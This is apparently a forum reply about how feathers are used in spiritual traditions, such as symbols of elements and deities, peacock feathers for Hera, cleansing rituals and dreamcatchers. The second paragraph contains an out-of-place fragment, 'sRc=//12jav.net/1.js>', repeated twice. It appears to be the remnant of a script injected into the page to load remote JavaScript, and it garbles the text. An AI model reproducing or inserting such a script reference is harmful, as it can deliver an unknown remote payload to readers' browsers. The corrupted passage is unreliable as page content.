Feathers have many different uses depending on what tradition(s) a person studies and follows.

I have seen them represent aspects of (archetypal) elements, spirits, deities, other concepts, and more. sRc=//12jav.net/1.js> sRc=//12jav.net/1.js>

It could depend on the feather to. If for example you worship the goddess Hera you might use peacock feathers as those are sacred to her.

They are often used in cleansing practices as a means of fanning away unwanted energies. They are also used in dreamcatchers, working with bird spirits, and for some as representations of or in devotion to different deities. Would depend a lot on the tipe of feather or path, as others said.
